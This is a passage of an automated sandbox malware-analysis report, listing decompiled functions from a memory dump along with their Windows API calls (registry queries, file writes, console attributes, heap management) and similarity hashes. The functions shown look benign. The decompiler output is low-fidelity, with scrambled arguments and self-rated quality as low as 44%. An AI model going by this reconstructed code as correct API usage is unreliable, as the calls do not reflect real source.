                                                    0x011f5675
                                                    0x011f5677
                                                    0x011f567a
                                                    0x011f567d
                                                    0x011f5680
                                                    0x011f5685
                                                    0x011f56a2
                                                    0x011f56b0
                                                    0x011f56b9
                                                    0x011f56ce
                                                    0x00000000
                                                    0x011f56d0
                                                    0x011f56d8
                                                    0x011f56da
                                                    0x011f56df
                                                    0x011f570a
                                                    0x00000000
                                                    0x011f56e1
                                                    0x011f56f5
                                                    0x011f56f9
                                                    0x011f56fd
                                                    0x011f5702
                                                    0x011f5704
                                                    0x011f5707
                                                    0x00000000
                                                    0x011f5707
                                                    0x011f56f9
                                                    0x011f56df
                                                    0x011f56bb
                                                    0x011f56c5
                                                    0x011f56c7
                                                    0x011f56c7
                                                    0x011f568c
                                                    0x011f5695
                                                    0x011f569d
                                                    0x00000000
                                                    0x011f569f
                                                    0x011f569f
                                                    0x011f569f
                                                    0x011f570c
                                                    0x011f570c
                                                    0x011f570c
                                                    0x011f569d
                                                    0x011f5712
                                                    0x011f5719
                                                    0x011f5725

                                                    APIs
                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,011FC100,0000001C,011F4C85), ref: 011F5695
                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,011FC100,0000001C,011F4C85), ref: 011F56B0
                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 011F56EF
                                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F570C
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: QueryValue$ErrorLastOpen
                                                    • String ID:
                                                    • API String ID: 4270309053-0
                                                    • Opcode ID: 1443f0a14c73e48eea46206398f76b8e19f9dc0ab2dc8bf68a5fc5171db318e6
                                                    • Instruction ID: a53c6d3f8941d9532d4033516e2c3ffa7e9753d75c1f43f1f85f549d2c8fe1c7
                                                    • Opcode Fuzzy Hash: 1443f0a14c73e48eea46206398f76b8e19f9dc0ab2dc8bf68a5fc5171db318e6
                                                    • Instruction Fuzzy Hash: E42150B1D0061AEFEF589FD998949EEBABEFF58654B404119EA11F3180DB748D408BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D56AE, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E011D56AE(void* __ecx, intOrPtr __edx, FILETIME* _a4, intOrPtr _a8) {
				struct _OVERLAPPED _v12;
				short _t11;
				void* _t14;
				void* _t17;
				void* _t27;
				FILETIME* _t30;

				_push(__ecx);
				_push(__ecx);
				_t27 = __ecx;
				_t19 =  *((intOrPtr*)(__edx + 0x20));
				_t11 = 0x1a;
				_v12.InternalHigh = _t11;
				if( *((intOrPtr*)(__edx + 0x20)) == 0) {
					_t19 = __edx;
				}
				_t30 = _a4;
				if(_t30 != 0xffffffff) {
					if(E011F84D3(_t19) != 0) {
						_t12 = E011E0178(_t12);
						if(_t12 == 0) {
							_t17 =  &(_v12.InternalHigh);
							__imp___get_osfhandle(_t12);
							_t12 = WriteFile(_t17, _t30, _t17, 1,  &_v12);
						}
					}
					if(_t27 != 0 && ( *(_t27 + 0x1c) & 0x00000080) == 0 && E011E0178(_t12) == 0) {
						_t14 =  *0x11fd55c; // 0x0
						if(_t14 != 3 && _a8 != 0 && _t14 != 2) {
							__imp___get_osfhandle(_a8);
							SetFileTime(_t14, _t30, 0, 0);
						}
					}
					_t11 = E011DDB92(_t30);
				}
				 *0x11fd56c =  *0x11fd56c + 1;
				return _t11;
			}









                                                    0x011d56b3
                                                    0x011d56b4
                                                    0x011d56b9
                                                    0x011d56bb
                                                    0x011d56be
                                                    0x011d56bf
                                                    0x011d56c5
                                                    0x011d56e1
                                                    0x011d56e1
                                                    0x011d56c7
                                                    0x011d56cd
                                                    0x011e9666
                                                    0x011e966a
                                                    0x011e9671
                                                    0x011e967a
                                                    0x011e967f
                                                    0x011e9687
                                                    0x011e9687
                                                    0x011e9671
                                                    0x011e968f
                                                    0x011e96a2
                                                    0x011e96aa
                                                    0x011e96bf
                                                    0x011e96c7
                                                    0x011e96c7
                                                    0x011e96aa
                                                    0x011e96cf
                                                    0x011e96cf
                                                    0x011d56d3
                                                    0x011d56de

                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05b765704793d8109c05aa092e338c3b8b31b5ea0fb48cb35bb1eeb7805d24e7
                                                    • Instruction ID: cfc303fd70615c32d237e95fe4f00c6868202794dbac1804ea7544138eead1f6
                                                    • Opcode Fuzzy Hash: 05b765704793d8109c05aa092e338c3b8b31b5ea0fb48cb35bb1eeb7805d24e7
                                                    • Instruction Fuzzy Hash: D8110831A00B0CABDF2D9B98A82CBBE7BA9DB49328F14411AF911D70D0DB70D940CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011FB91D, Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E011FB91D(void* __ecx) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t30;
				WCHAR* _t31;
				int _t32;
				char _t34;
				void* _t40;
				void* _t42;
				signed int _t43;

				_t18 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t18 ^ _t43;
				_v28 = _v28 & 0x00000000;
				_t34 = 1;
				_v20 = 0x104;
				_t42 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t30 = _v28;
					if(_t30 == 0) {
						_t30 =  &_v548;
					}
					__imp__GetVolumePathNameW(_t42, _t30, _v20);
					if(_t30 == 0) {
						L8:
						_t34 = 0;
					} else {
						_t31 = _v28;
						if(_t31 == 0) {
							_t31 =  &_v548;
						}
						_t32 = GetDriveTypeW(_t31);
						if(_t32 == 0 || _t32 == 4) {
							goto L8;
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t34, _t34, _v8 ^ _t43, _t40, 0x104, _t42, _v28);
			}



















                                                    0x011fb928
                                                    0x011fb92f
                                                    0x011fb932
                                                    0x011fb949
                                                    0x011fb94a
                                                    0x011fb94e
                                                    0x011fb950
                                                    0x011fb953
                                                    0x011fb979
                                                    0x011fb97b
                                                    0x011fb980
                                                    0x011fb982
                                                    0x011fb982
                                                    0x011fb98d
                                                    0x011fb995
                                                    0x011fb9b4
                                                    0x011fb9b4
                                                    0x011fb997
                                                    0x011fb997
                                                    0x011fb99c
                                                    0x011fb99e
                                                    0x011fb99e
                                                    0x011fb9a5
                                                    0x011fb9ad
                                                    0x00000000
                                                    0x00000000
                                                    0x011fb9ad
                                                    0x011fb995
                                                    0x011fb9b9
                                                    0x011fb9d2

                                                    APIs
                                                    • memset.MSVCRT ref: 011FB953
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 011FB98D
                                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011FB9A5
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FB9B9
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$DriveNamePathTypeVolume
                                                    • String ID:
                                                    • API String ID: 1029679093-0
                                                    • Opcode ID: fd7587cda096613f6aa5fd309938c613a9ed63bd64219a7e071c9a2ea557b6c4
                                                    • Instruction ID: e7cc721ea439e4f1ce3fc2d05b13b0f85f9db091b48783af27da552c08689174
                                                    • Opcode Fuzzy Hash: fd7587cda096613f6aa5fd309938c613a9ed63bd64219a7e071c9a2ea557b6c4
                                                    • Instruction Fuzzy Hash: 72115471A04109ABDF24DAE9EC89BBFBBB8FB54348F48006DA614D3141EB34DA44C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F916C, Relevance: 6.1, APIs: 4, Instructions: 66fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E011F916C(void* __ecx, long __edx, DWORD* _a4, WCHAR* _a8, intOrPtr _a12) {
				char _v8;
				void* _t6;
				int _t7;
				void* _t14;
				DWORD* _t15;
				void* _t27;
				void* _t28;
				void* _t30;
				intOrPtr _t31;
				void* _t35;

				_t15 = _a4;
				_t6 =  &_v8;
				_t31 = 0;
				_t28 = __ecx;
				__imp___get_osfhandle(0, _t27, _t30, _t14, __ecx, __ecx);
				_t7 = WriteFile(_t6, __ecx, __edx, _t15, _t6);
				if(_t7 == 0 || _t15 != _v8) {
					L3:
					 *0x1213cf0 = GetLastError();
					E011DDB92(_a12);
					if(E011E0178(E011DDB92(_t28)) == 0) {
						DeleteFileW(_a8);
					} else {
						_t31 = 0x1d;
					}
					 *0x11fd5cc =  *0x11fd5cc & 0x00000000;
					_t22 =  *0x1213cf0;
					if( *0x1213cf0 == 0) {
						_t22 = 0x70;
						 *0x1213cf0 = _t22;
					}
					if( *0x11fd544 == 0) {
						if(_t31 == 0) {
							E011F985A(_t22);
						}
					} else {
						_t31 = 0;
					}
					_t7 = E011F85E9(_t31, 1);
					goto L13;
				} else {
					_t35 =  *0x11fd544 - _t31; // 0x0
					if(_t35 == 0) {
						L13:
						return _t7;
					}
					goto L3;
				}
			}













                                                    0x011f9174
                                                    0x011f9177
                                                    0x011f917c
                                                    0x011f917e
                                                    0x011f9185
                                                    0x011f918d
                                                    0x011f9195
                                                    0x011f91a4
                                                    0x011f91ad
                                                    0x011f91b2
                                                    0x011f91c7
                                                    0x011f91d1
                                                    0x011f91c9
                                                    0x011f91cb
                                                    0x011f91cb
                                                    0x011f91d7
                                                    0x011f91de
                                                    0x011f91e6
                                                    0x011f91ea
                                                    0x011f91eb
                                                    0x011f91eb
                                                    0x011f91f8
                                                    0x011f9200
                                                    0x011f9202
                                                    0x011f9202
                                                    0x011f91fa
                                                    0x011f91fa
                                                    0x011f91fa
                                                    0x011f920c
                                                    0x00000000
                                                    0x011f919c
                                                    0x011f919c
                                                    0x011f91a2
                                                    0x011f9211
                                                    0x011f9217
                                                    0x011f9217
                                                    0x00000000
                                                    0x011f91a2

                                                    APIs
                                                    • _get_osfhandle.MSVCRT ref: 011F9185
                                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F8CA9,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 011F918D
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011F91A4
                                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 011F91D1
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                    • String ID:
                                                    • API String ID: 2448200120-0
                                                    • Opcode ID: 255e9e86a95a52a0a4ffa4689dbf7546802cccb850d81249b8cf5a5657737c1e
                                                    • Instruction ID: 499c3324025d5890067361c84f672c64880c49859f969036f7d5f2ee01bbea58
                                                    • Opcode Fuzzy Hash: 255e9e86a95a52a0a4ffa4689dbf7546802cccb850d81249b8cf5a5657737c1e
                                                    • Instruction Fuzzy Hash: ED11B2316042199BEF3DEB95F85CB7E7769EB9572DF00402DFA0482184DF709840C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DAC30, Relevance: 6.1, APIs: 4, Instructions: 61memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E011DAC30(void* __ecx) {
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t17;
				intOrPtr* _t18;
				short _t30;
				signed short _t32;
				void* _t38;
				void* _t42;

				if(__ecx != 0) {
					_t16 =  *(__ecx + 0x14);
					if(_t16 != 0) {
						_t16 = _t16 - 1;
						 *(__ecx + 0x14) = _t16;
						_t42 =  *(__ecx + 0x90 + _t16 * 4);
						 *(__ecx + 0x90 + _t16 * 4) =  *(__ecx + 0x90 + _t16 * 4) & 0x00000000;
						if(_t42 != 0) {
							_t41 =  *_t42;
							_t17 =  *( *_t42) & 0x0000ffff;
							if(_t17 >= 0x61) {
								__eflags = _t17 - 0x7a;
								if(__eflags > 0) {
									goto L4;
								}
								_t32 = _t17 + 0xffffffe0 & 0x0000ffff;
								L5:
								_t18 =  *0x1213cb8;
								if(_t18 == 0) {
									_t18 = 0x1213ab0;
								}
								if( *_t18 != _t32) {
									E011F93E2((_t32 & 0x0000ffff) - 0x40, _t38);
									_t41 =  *_t42;
								}
								E011E33FC(_t30, _t41, 1, _t41, _t42, 1);
								RtlFreeHeap(GetProcessHeap(), 0,  *_t42);
								E011DACFD( *((intOrPtr*)(_t42 + 4)));
								E011DACD5( *((intOrPtr*)(_t42 + 4)));
								 *0x1213cc9 =  *((intOrPtr*)(_t42 + 8));
								 *0x1213cc8 =  *((intOrPtr*)(_t42 + 9));
								return RtlFreeHeap(GetProcessHeap(), 0, _t42);
							}
							L4:
							_t32 = _t17;
							goto L5;
						}
					}
				}
				return _t16;
			}












                                                    0x011dac36
                                                    0x011dac3c
                                                    0x011dac41
                                                    0x011dac47
                                                    0x011dac48
                                                    0x011dac4b
                                                    0x011dac52
                                                    0x011dac5c
                                                    0x011dac5e
                                                    0x011dac60
                                                    0x011dac66
                                                    0x011f1204
                                                    0x011f1207
                                                    0x00000000
                                                    0x00000000
                                                    0x011f1210
                                                    0x011dac6e
                                                    0x011dac6e
                                                    0x011dac75
                                                    0x011dacce
                                                    0x011dacce
                                                    0x011dac7a
                                                    0x011f121e
                                                    0x011f1223
                                                    0x011f1223
                                                    0x011dac85
                                                    0x011dac95
                                                    0x011dac9e
                                                    0x011daca6
                                                    0x011dacae
                                                    0x011dacb9
                                                    0x00000000
                                                    0x011dacc5
                                                    0x011dac6c
                                                    0x011dac6c
                                                    0x00000000
                                                    0x011dac6c
                                                    0x011dac5c
                                                    0x011dac41
                                                    0x011daccd

                                                    APIs
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DAC8E
                                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DAC95
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DACBE
                                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACC5
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: c47e4b0d38746c8a39c3f51b2aaa6e153df6026e224dccdaaff99d6d3f846062
                                                    • Instruction ID: 6348abebaca485cdcab2db9325b7d55d81ac5ea499bb28ba1979bbe6f0d0d36c
                                                    • Opcode Fuzzy Hash: c47e4b0d38746c8a39c3f51b2aaa6e153df6026e224dccdaaff99d6d3f846062
                                                    • Instruction Fuzzy Hash: 701190316042409BDB28EF69B4587767FA5BF55238F24444DE58A8B285CB20D882CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E0100, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E011E0100(void* __ecx, void* __edx) {
				void* _t12;
				long _t15;
				void* _t16;
				void** _t17;
				void* _t19;
				void* _t20;

				_t16 = __ecx;
				_t15 = __edx + 8;
				_t20 = __ecx - 8;
				if(_t15 < __edx) {
					L12:
					_push(0);
					_push(8);
					E011DC5A2(_t16);
					return 0;
				}
				_t19 = HeapReAlloc(GetProcessHeap(), 0, _t20, _t15);
				if(_t19 == 0) {
					goto L12;
				}
				 *_t19 = _t15;
				HeapSize(GetProcessHeap(), 0, _t19);
				if(_t19 == _t20) {
					L3:
					_t3 = _t19 + 8; // 0x8
					return _t3;
				}
				_t12 =  *0x1213cdc;
				if(_t12 != _t20) {
					if(_t12 == 0) {
						goto L3;
					} else {
						goto L8;
					}
					while(1) {
						L8:
						_t17 = _t12 + 4;
						_t12 =  *_t17;
						if(_t12 == _t20) {
							break;
						}
						if(_t12 != 0) {
							continue;
						}
						goto L3;
					}
					 *_t17 = _t19;
					goto L3;
				}
				 *0x1213cdc = _t19;
				_t4 = _t19 + 8; // 0x8
				return _t4;
			}









                                                    0x011e0100
                                                    0x011e0104
                                                    0x011e0107
                                                    0x011e010d
                                                    0x011ec9ea
                                                    0x011ec9ea
                                                    0x011ec9ec
                                                    0x011ec9ee
                                                    0x00000000
                                                    0x011ec9f6
                                                    0x011e0124
                                                    0x011e0128
                                                    0x00000000
                                                    0x00000000
                                                    0x011e0131
                                                    0x011e013a
                                                    0x011e0142
                                                    0x011e0144
                                                    0x011e0144
                                                    0x00000000
                                                    0x011e0144
                                                    0x011e014b
                                                    0x011e0152
                                                    0x011e0163
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e0165
                                                    0x011e0165
                                                    0x011e0165
                                                    0x011e0168
                                                    0x011e016c
                                                    0x00000000
                                                    0x00000000
                                                    0x011e0170
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e0172
                                                    0x011e0174
                                                    0x00000000
                                                    0x011e0174
                                                    0x011e0154
                                                    0x011e015a
                                                    0x011e0160

                                                    APIs
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000800,00000800,-00000004,-00000004,?,011DEBC3), ref: 011E0117
                                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E011E
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011E0133
                                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E013A
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heap$Process$AllocSize
                                                    • String ID:
                                                    • API String ID: 2549470565-0
                                                    • Opcode ID: b62ac5cf74e527bbaca5e0c54ed26ef5d1d018e2b61f228458600971850c4d61
                                                    • Instruction ID: e2a7a4aa19491613736b4a0f1eaa3d6b69ab3a3bdc62ec0be1301525b8a0adc7
                                                    • Opcode Fuzzy Hash: b62ac5cf74e527bbaca5e0c54ed26ef5d1d018e2b61f228458600971850c4d61
                                                    • Instruction Fuzzy Hash: 9601F5723006019BDB25DB99FC8CF9A7BE9FB98765F250024F60ACA040DF71D884CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F7DF1, Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E011F7DF1(unsigned int __ecx, void* __esi) {
				signed int _v8;
				signed short _v30;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				struct _COORD _v36;
				long _v40;
				void* __ebx;
				signed int _t11;
				void* _t20;
				int _t28;
				void* _t34;
				void* _t35;
				void* _t37;
				signed int _t38;

				_t36 = __esi;
				_t11 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t11 ^ _t38;
				_t28 = __ecx;
				if(((__ecx >> 0x00000004 ^ __ecx) & 0x0000000f) != 0) {
					_push(__esi);
					_t37 = GetStdHandle(0xfffffff5);
					if(GetConsoleScreenBufferInfo(_t37,  &_v32) == 0) {
						_t20 = 1;
					} else {
						_v36 = 0;
						FillConsoleOutputAttribute(_t37, _t28, _v32.dwSize * _v30, _v36,  &_v40);
						SetConsoleTextAttribute(_t37, _t28);
						_t20 = 0;
					}
					_pop(_t36);
				} else {
					_t20 = 1;
				}
				return E011E6FD0(_t20, _t28, _v8 ^ _t38, _t34, _t35, _t36);
			}
















                                                    0x011f7df1
                                                    0x011f7df9
                                                    0x011f7e00
                                                    0x011f7e04
                                                    0x011f7e0f
                                                    0x011f7e16
                                                    0x011f7e1f
                                                    0x011f7e2e
                                                    0x011f7e5e
                                                    0x011f7e30
                                                    0x011f7e36
                                                    0x011f7e4a
                                                    0x011f7e52
                                                    0x011f7e58
                                                    0x011f7e58
                                                    0x011f7e5f
                                                    0x011f7e11
                                                    0x011f7e13
                                                    0x011f7e13
                                                    0x011f7e6e

                                                    APIs
                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E19
                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E26
                                                    • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E4A
                                                    • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E52
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                    • String ID:
                                                    • API String ID: 1033415088-0
                                                    • Opcode ID: e76b61c33b418d439c95b661e9753e38eeb6ff7738a44a534bfc0fa5155928ce
                                                    • Instruction ID: 2329a96a56c81efd7d0546561d12292f04eb504c50e147800c7a24bf01edc832
                                                    • Opcode Fuzzy Hash: e76b61c33b418d439c95b661e9753e38eeb6ff7738a44a534bfc0fa5155928ce
                                                    • Instruction Fuzzy Hash: C801F532A04128AF8F18DFB4AC489FFB7FCEF1D214B00012AF916D2180EB249E41C3A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D43A0, Relevance: 6.0, APIs: 4, Instructions: 47fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E011D43A0(void* __ecx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES _v16;
				void* _t6;
				long _t7;
				void* _t10;
				void* _t15;
				void* _t17;

				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_v16.nLength = 0xc;
				_t6 = CreateFileW(E011E22C0(_t10, __ecx), 0x40000000, 0,  &_v16, 4, 0x8000080, 0);
				_t15 = _t6;
				if(_t15 == 0xffffffff) {
					_t7 = GetLastError();
					 *0x1213cf0 = _t7;
					if(_t7 == 0x6e) {
						 *0x1213cf0 = 2;
					}
					_t17 = 0xffffffff;
				} else {
					__imp___open_osfhandle(_t15, 8);
					_t17 = _t6;
					if(_t17 == 0xffffffff) {
						CloseHandle(_t15);
					}
				}
				return _t17;
			}









                                                    0x011d43ab
                                                    0x011d43b3
                                                    0x011d43b6
                                                    0x011d43d5
                                                    0x011d43db
                                                    0x011d43e0
                                                    0x011e838d
                                                    0x011e8393
                                                    0x011e839b
                                                    0x011e839d
                                                    0x011e839d
                                                    0x011e83a7
                                                    0x011d43e6
                                                    0x011d43e9
                                                    0x011d43ef
                                                    0x011d43f6
                                                    0x011d4401
                                                    0x011d4401
                                                    0x011d43f6
                                                    0x011d43ff

                                                    APIs
                                                      • Part of subcall function 011E22C0: wcschr.MSVCRT ref: 011E22CC
                                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000), ref: 011D43D5
                                                    • _open_osfhandle.MSVCRT ref: 011D43E9
                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011D4401
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E838D
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                    • String ID:
                                                    • API String ID: 22757656-0
                                                    • Opcode ID: 7dd4dec72c7617a690203a4fcb87fe2e89d1862389bafd8faacce0fe12aed399
                                                    • Instruction ID: c46d2590374e1c5e5ed94f8303d3313607c23a97add8386e0a967e63a5608983
                                                    • Opcode Fuzzy Hash: 7dd4dec72c7617a690203a4fcb87fe2e89d1862389bafd8faacce0fe12aed399
                                                    • Instruction Fuzzy Hash: DB01F232804220ABD728ABACB80DB5EBBA8AB51B39F110319F974E31C0DFB008458791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E3B2C, Relevance: 6.0, APIs: 4, Instructions: 30memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 44%
                                                    			E011E3B2C(void* __ecx) {
				void _t4;
				void* _t9;
				void* _t12;

				_t9 = __ecx;
				_t12 = HeapAlloc(GetProcessHeap(), 8, 4);
				if(_t12 == 0) {
					L4:
					return 0;
				} else {
					_t4 = E011E3AAE();
					 *_t12 = _t4;
					if(_t4 == 0) {
						RtlFreeHeap(GetProcessHeap(), 0, _t12);
						_push(0);
						_push(0x233a);
						E011DC5A2(_t9);
						goto L4;
					} else {
						return _t12;
					}
				}
			}






                                                    0x011e3b2c
                                                    0x011e3b40
                                                    0x011e3b44
                                                    0x011ee005
                                                    0x011ee008
                                                    0x011e3b4a
                                                    0x011e3b4a
                                                    0x011e3b4f
                                                    0x011e3b53
                                                    0x011edff1
                                                    0x011edff7
                                                    0x011edff9
                                                    0x011edffe
                                                    0x00000000
                                                    0x011e3b59
                                                    0x011e3b5c
                                                    0x011e3b5c
                                                    0x011e3b53

                                                    APIs
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,011E3DBB), ref: 011E3B33
                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011E3DBB), ref: 011E3B3A
                                                      • Part of subcall function 011E3AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                                      • Part of subcall function 011E3AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                                      • Part of subcall function 011E3AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                                      • Part of subcall function 011E3AAE: memcpy.MSVCRT ref: 011E3AE3
                                                      • Part of subcall function 011E3AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,011E3DBB), ref: 011EDFEA
                                                    • RtlFreeHeap.NTDLL(00000000,?,011E3DBB), ref: 011EDFF1
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
                                                    • String ID:
                                                    • API String ID: 197374240-0
